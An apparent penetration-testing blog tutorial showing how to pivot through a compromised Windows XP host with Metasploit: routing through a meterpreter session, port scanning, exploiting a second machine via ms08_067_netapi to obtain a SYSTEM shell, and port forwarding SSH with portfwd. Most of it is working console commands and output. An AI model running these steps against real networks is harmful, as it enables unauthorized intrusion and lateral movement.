Pivoting through a meterpreter session
So you’ve owned a box and now you want to exploit others using the first as a pivot.
First thing to do is background your current meterpreter session:
1 2 3 4 5 6 7 | meterpreter > background msf exploit(multi_handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 XPSP0\Administrator @ XPSP0 81.142.243.100:21 -> 1.2.3.4:1050 |
Then add the pivot: route add [ip of target] [subnet] [meterpreter session id]
1 2 3 4 5 6 7 8 | msf exploit(ms08_067_netapi) > route add 1.2.3.4 255.255.255.0 1 msf exploit(ms08_067_netapi) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 1.2.3.4 255.255.255.0 Session 1 msf exploit(ms08_067_netapi) > |
Now to run a tcp scan through the pivot 🙂
1 2 3 4 5 6 7 | msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > set RHOSTS 1.2.3.10 RHOSTS => 1.2.3.10 msf auxiliary(tcp) > run [*] 1.2.3.10:139 - TCP OPEN [*] 1.2.3.10:135 - TCP OPEN [*] 1.2.3.10:445 - TCP OPEN |
Then simply exploit the second box using the same metasploit console:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 1.2.3.10 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST 1.2.3.10 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English [*] Selected Target: Windows XP SP0/SP1 Universal [*] Attempting to trigger the vulnerability... [*] Sending stage (749056 bytes) [*] Meterpreter session 2 opened (81.142.243.100-1.2.3.4:0 -> 1.2.3.5:4444) at 2011-06-20 10:56:13 +0100 |
And to show the second session running through the first we’ll list the sessions again:
1 2 3 4 5 6 7 8 9 10 | meterpreter > background msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 XPSP0\Administrator @ XPSP0 81.142.243.100:21 -> 1.2.3.4:1050 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ XPSP0C 81.142.243.100-1.2.3.4:0 -> 1.2.3.10:4444 msf exploit(ms08_067_netapi) > |
Sweet!!!
UPDATE:
I forgot to mention the ability to port forward from within a meterpreter session:
Lets just say that the target2 [1.2.3.10] had ssh on it and you wanted to connect to that ssh session but couldn’t do so directly…. well, this is where the portfwd command comes in.
1 2 3 | msf > sessions -i 1 meterpreter > portfwd add -l 44422 -p 22 -r 1.2.3.10 [*] Local TCP relay created: 0.0.0.0:44422 <-> 1.2.3.10:22 |
What the above does is map the local TCP port 44422 on the attackers box to TCP port 22 on 1.2.3.10. Now simply connect to the target2 from a console using:
1 | ssh 127.0.0.1:44422 |
The above applies for any service, simply just map it to an unused local port (to save confusion try to make the ports easy to understand, i append 4’s to the port).
1 2 3 | remote:80 --> local:44480 remote:22 --> local:44422 remote:8080--> local:48080 |
Recent Posts
- Automating an Active Directory Audit in PowerShell
- CherryTree on MacOS (OSX)
- IPv6 LocalLink to IPv4 scanning tool
- NetKit IPv6 Test Lab
- WiPiResponder = Pi Zero W + Responder
- Recovering an activity from a Garmin 920 XT Forerunner
- hashcat on OS X – getting it going!
- PHP NMAP Scan Page
- Hacking the ATN X-sight – part1
- NFSShell on Kali Linux 2.0
Leave a Reply
You must be logged in to post a comment.